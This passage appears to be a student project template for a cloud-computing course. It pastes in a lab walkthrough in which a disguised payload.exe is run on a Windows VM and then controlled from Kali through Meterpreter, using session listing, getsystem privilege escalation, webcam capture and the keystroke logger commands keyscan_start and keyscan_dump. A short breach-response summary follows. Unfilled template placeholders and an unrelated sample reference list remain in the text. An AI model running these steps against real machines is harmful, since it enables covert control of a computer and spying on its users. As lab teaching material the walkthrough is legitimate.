Figure 1.29 Screenshot of PLABWIN10: Closing the session with the FTP server using the quit
command.
Step 11
Projektni zadatak: Naziv projektnog zadatka284
Ime i prezime, br.index
CS450 – Cloud Computing
Open the Windows Explorer from the taskbar and navigate to the following path:
C:\Users\administrator.PRACTICELABS
Figure 1.30 Screenshot of PLABWIN10: Showing the successful download of the payload.exe on the
Windows system.
Step 12
Projektni zadatak: Naziv projektnog zadatka286
Ime i prezime, br.index
CS450 – Cloud Computing
Move the file to the Downloads folder by dragging it. You should then see the file in the Downloads
folder.
Figure 1.31 Screenshot of PLABWIN10: Moving the file, payload.exe, to the Downloads folder.
Projektni zadatak: Naziv projektnog zadatka287
Ime i prezime, br.index
CS450 – Cloud Computing
Step 13
Navigate to the Downloads folder. Notice that the payload.exe is now present in this folder.
Figure 1.32 Screenshot of PLABWIN10: Showing the file, payload.exe, in the Downloads folder.
Step 14
After the file is moved, rename the file to setup.exe. Then, double-click the file to execute it.
Quickly, switch back to PLABKALI01. Notice that the connection with the victim’s system is already
opened.
Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window
open. Do NOT shut it down or exit from it.
Figure 1.34 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the payload.exe file is executed.
The payload is now running on the victim’s system. You need to now exploit the victim’s system.
Step 1
Ensure that you are connected to the PLABKALI01. You need to now open the session with the
victim’s system.
sessions -i 1
Figure 1.35 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the payload.exe file is executed.
Step 2
Projektni zadatak: Naziv projektnog zadatka294
Ime i prezime, br.index
CS450 – Cloud Computing
Notice the interaction with the victim’s system has now started. You are now virtually controlling the
victim’s system. Let’s see the processes that are running on the victim’s system.
ps
Notice that the processes running on the victim’s system are now displayed. It is important to note the
last running process, setup.exe, which is the payload that you have executed on the victim’s system.
Figure 1.36 Screenshot of PLABKALI01: Listing the running processes on the victim’s system.
Step 3
Next, you need to escalate privileges. Type the following command press Enter:
getsystem
Figure 1.37 Screenshot of PLABKALI01: Executing the getsystem command to escalate privileges on
the victim’s system.
Step 4
Projektni zadatak: Naziv projektnog zadatka298
Ime i prezime, br.index
CS450 – Cloud Computing
Let’s now check if the victim’s system has a webcam and take a picture. To check this, enter the
following command and press Enter:
webcam_snap
Notice the output, which states that victim’s system does not have a webcam.
Figure 1.38 Screenshot of PLABKALI01: Using the webcam on the victim’s system to take a picture.
Step 5
Let’s try to capture the keystrokes on the victim’s system. Type the following command and press
Enter:
keyscan_start
Figure 1.39 Screenshot of PLABKALI01: Starting the keystroke sniffer on the victim’s system.
Step 6
Let’s now see the keys that have been pressed on the victim’s system. Type the following command
and press Enter:
keyscan_dump
Notice that several keys were pressed since the sniffer has started.
Figure 1.40 Screenshot of PLABKALI01: Capturing the keystrokes on the victim’s system.
Step 7
Since the privilege escalation failed, you can try to do something else with the system. First, let’s
background the session.
background
Notice that session 1 is now running in the background. Here, you can run more exploits if you desire.
There are a lot of options available and you can explore them in your free time.
Figure 1.41 Screenshot of PLABKALI01: Putting the session into the background.
Shutdown all virtual machines used in this lab, before proceeding to the next module. Alternatively,
you can log out of the lab platform.
Summary
You covered the following activities in this module:
It is important to understand that the impact of a breach is not only related to the technical aspect of it, stolen
data, damaged databases, or damage to intellectual property, the damage also extends to the company’s
reputation. Responding to a data breach is a very dynamic process.
Below are some important measures a company should take when a security breach is identified, according to
many security experts:
Communicate the issue. Internally employees should be informed of the problem and called to action.
Externally, clients should be informed through direct communication and official announcements.
Communication creates transparency, which is crucial in this type of situation.
Provide details. Explain why the situation took place and what was compromised. It is also expected that the
company take care of the costs of identity theft protection services for affected customers.
Understand what caused and facilitated the breach. If necessary, hire forensics experts to research and learn
the details.
Apply what was learned from the forensics investigation to ensure similar breaches do not happen in the
future.
Ensure all systems are clean, no backdoors were installed, and nothing else has been compromised.
Attackers will often attempt to leave a backdoor to facilitate future breaches. Make sure this does not happen.
8 ZAKLJUČAK
U zaključku se osvrnuti na svako poglavlje i napisati kratak rezime za njega kao i za kompletan rad.
9 LITERATURA
[1.] Banerjee, A. and Watson, T.F. (2011) Pickard’s manual of operative dentistry. 9th edn. Oxford: Oxford
University Press.
[2.] Davidson, A. (2013) ‘The Saudi Marathon Man’, The New Yorker, 16 April. Available at:
http://www.newyorker.com/news/daily-comment/the-saudi-marathon-man (Accessed: 22 June 2015).
[3.] Guy, J. (2001) The view across the river: Harriette Colenso and the Zulu struggle against imperialism.
Charlottesville, Virginia: University Press of Virginia.
[4.] Hislop, V. (2014) The sunrise. Available at http://www.amazon.co.uk/kindlestore (Downloaded: 17 June
2015).
[5.] Homer (1997) The Iliad. Translated by J. Davies. Introduction and notes by D. Wright. London: Dover
Publications.
[6.] Knapik, J. J., Cosio-Lima, L. M., and Reynolds, K. L. (2015) ‘Efficacy of functional movement screening for
predicting injuries in coast guard cadets’, The Journal of Strength and Conditioning Research, 29 (5), pp.
1157-1162. EDUC 1028: E-learning. Available at: http://intranet.bham.ac.uk (Accessed: 25 June 2015).
[7.] Lucas, G. (2004) The wonders of the Universe. 2nd edn. Edited by Frederick Jones, James Smith and
Tony Bradley. London: Smiths.
[8.] Medicine in old age (1985) 2nd edn. London: British Medical Association.
[9.] ‘Rush (band)’ (2015) Wikipedia. Available at https://en.wikipedia.org/?title=Rush_(band) (Accessed: 18
June 2015).
10 PRILOZI
10.1 PRILOG 1
10.2 PRILOG 2